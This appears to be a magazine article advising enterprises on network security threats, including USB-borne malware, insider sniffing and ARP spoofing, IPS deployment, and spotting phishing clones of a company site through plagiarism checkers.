We are all well aware of the importance of securing an enterprise's IT setup
and the measures to be taken to protect against the various security threats.
But every year we come to know about some security disaster or the other that
has struck a reputed organization. And the reason is the same; we don't update
our security solutions regularly. Security devices and practices are not issues
that you install once and forget the other day. You need to revisit those
regularly. Even a minute change in the IT infrastructure would require a
complete changeover in your security policies. For instance, imagine you have a
web server running in your organization, and your e-mail server was
outsourced/hosted, and now you decide to shift your mail server as well to your
own datacenter. In such a scenario, the perimeter security you would be having
might need a complete makeover, so that it can cope with the risks which a mail
server possesses and those which were not there in case of a web server. Intel
co-founder Andrew S. Grove once said, 'Only Paranoid Survives.' We have to be
paranoid about security to survive against ongoing new threats taking birth
every day. This story talks about some of the most common and uncommon threats
that your enterprise faces each day and also what are the best approaches to
combat them.
Blocking the gaping holes
As
it is vital to safeguard your house at entry points, similarly it's always
important to protect your IT infrastructure at all possible points of attack.
But to do so, first you have to understand what could be the entry points in
your IT infrastructure. Internet or the broadband gateway is not always the only
point of entry for hackers. Rather hackers and worms are pretty smart now and
know that today people use a firewall to restrict unwanted incoming connections.
They would rather focus on other contemporary ways of getting into the network.
And once they enter, they can open channels and ports through your Internet
connection to go out and connect to the outside world.
Even a simple USB pen drive could be that entry point. These drives are
capable of 'autorun' and are plugged into many machines each single day, and
hence can get infected very easily. We have visitors coming to us with their own
USB drives, with data, and share it with us by copying it to our production
machines. And if that USB drive is compromised, it can easily upload a worm or a
virus or a rootkit in a machine. And once it gets uploaded, it can easily start
spreading across the network and infecting other machines. That's not all; these
viruses can easily start opening up channels from your PC to hacker machines and
can then start uploading sensitive data. Not just a pen drives but also portable
devices such as digital cameras, laptops, mobile phones, PDAs and handhelds, all
of them pose the same threat.
So, you must be figuring out how one to protect your infrastructure from
these threats. One option could be to ban all portable data transfer devices in
your organization, which many enterprises are actually doing. But that is not
the right approach as by doing so you are completely avoiding the use of a great
technology. Rather you should deploy solutions that can take care of the risk
and at the same time you can keep using benefits of such portable devices.
Tools such as this one called EtherApe are very handy to quickly determine worm attacks that flood the network. In one shot you can see the infected nodes |
Another solution would be a good end point security solution. Essentially an
end point solution is nothing but an antivirus/antispyware which sits on all the
workstations and laptops (even on mobile phones for that matter), but it
connects back to a centralized server for upgrades, deployments and
logging/reporting. There are plenty of such solutions available from different
vendors such as Symantec, Micro World, Quick Heal, etc.
Other
way of protecting against such type of attacks is by deploying a firewall or a
UTM solution which not only scans for the inbound (incoming) traffic but also
scans the outbound (outgoing) traffic. This will make sure that if by chance any
malware or virus has entered your network and already spread itself, the device
would prevent it from opening ports and channels to hackers' websites and also
from inviting more worms or uploading sensitive data. There are quite a few
organizations that deal with such UTM/Firewall solutions, which scan both
inbound and outbound traffic. Some examples are Cyberoam, GajShield, etc.
The threat within
According to a survey which we did last year in the month of Jan, it was found
that internal security threats can sometimes be more deadly than external ones.
This is a very crucial point to remember. A disgruntled employee could give
strategic information to you competition. It could even be done by an innocent
employee 'unknowingly'. Such cases are equally dangerous and need to be tackled
differently. Just imagine, if an employee turns hostile and passes strategic
business information to competition? This is a spine chilling thought, but can
become a reality at some point of time.
To learn about how you can protect your IT infrastructure from such threats
the first thing to do is to understand the difference between an internal and an
external attack. There are essentially two types of attacks which someone
sitting inside the network can perform and which rarely occur through an
outsider. These attacks are Ethernet sniffing and spoofing. The former is used
to promiscuously listen to the flowing traffic on the network and gathering data
from such activities, while the latter means faking the identity of some other
machine to access data intended for that machine. Both are very serious
scenarios that could result in loss of precious data.
The solutions for such issues are twofold. Either you secure the data or you
secure the medium. For securing data, you have to encrypt each and every piece
of sensitive data travelling across the network. For example your mail,
passwords, files, etc all have to be encrypted; whenever they are copied or
transferred over the network.
A non-traditional way to check whether your site is being faked for a phishing attack is to use an online plagiarism checking website to see replicas of your site's content |
And to secure the medium, you have to replace your network switches with the
once that is more secure. Yes! There are network switches which are secure and
others which are not. To understand this, first you have to understand how data
is switched inside a network switch. For switching data all switches have a
cache table called the arp cache table, which keeps a log of all the machines
connected to it, and keeps a pair of the machine's IP and MAC addresses. For
spoofing data, a hacker manipulates this entry and changes the IP MAC pair which
is called the ARP FlipFlop.
To protect against such kinds of attacks we do have switches which provide an
encrypted arp cache table and hence can't be manipulated or read by hacking
machines. These secure switches
are easily available through most of the switch vendors but are slightly heavy
on your pocket.
You obviously can't change your complete IT infrastructure by deploying new
switches and at the same time it may not be feasible to even encrypt all data
traveling on your network. In such a case, you can deploy an inward facing IPS
solution with alerts. This IPS is essentially an intrusion detection and
prevention system which checks for all types of spoofing, sniffing or other
attacks on the network, and alerts you in case of a problem. It also tells you
the source and destination of the attack. Once you get the source of such an
attack, you can catch the attacker red handed. You can get an IPS solution as a
part of a UTM solution or you can opt for a stand alone IPS system. Snort is one
of the most famous IPS system for wired networks and Kismet is a renowned
solution in the wireless domain.
However, while deploying an IPS solution you should always configure alerts
in such a way that there is minimal delay between generation and delivery of the
alert. So, for instance an SMS alert will be the quickest amongst the lot.
Faking of identity
Phishing or faked websites are always a key concern for users doing online
transactions, but it is a bigger concern for enterprises who own websites that
can be phishing targets. When a site is phished, it is out of the control of the
owner of the actual site as he doesn't even know that his site has been phished,
unless someone reports a scam about it. And such phishing sites are the biggest
cause for loss of reputation for such websites.
So, if you own a website that is vulnerable to phishing, you must start
thinking of measures to take towards preventing it. Yes, you would have to
secure your site with digital certificates from known certification authorities,
and would need to introduce multifactor authentication for your users and
customers.
But other than doing all this there is another easy way to keep track of
which sites are trying to phish your website. The technique doesn't use any
security device or application; rather it works on the great power of today's
search engines.
If you do a simple search on the net you will find lots of free and
commercial web based plagiarism detection tools. Essentially these tools are
used for checking copying of copyrighted material across websites. Such tools
tally each and every sentence on a website and try to search for matching
sentences on other websites, indexed on a given search engine.
During the process of phishing, the attacker copies the actual website to
create an exact replica in terms of look and feel, and so he must be using the
same text as the real site.
If you run your website through a plagiarism checker, it must show you all
websites with the same text, including those that are likely to be phishing
websites. This technique works pretty well with websites having fewer images and
animations and more of text.
One such free website where you can check for plagiarism is http://copyscape.com.
It gives you 10 tries in a one month, which should be good enough for a regular
check.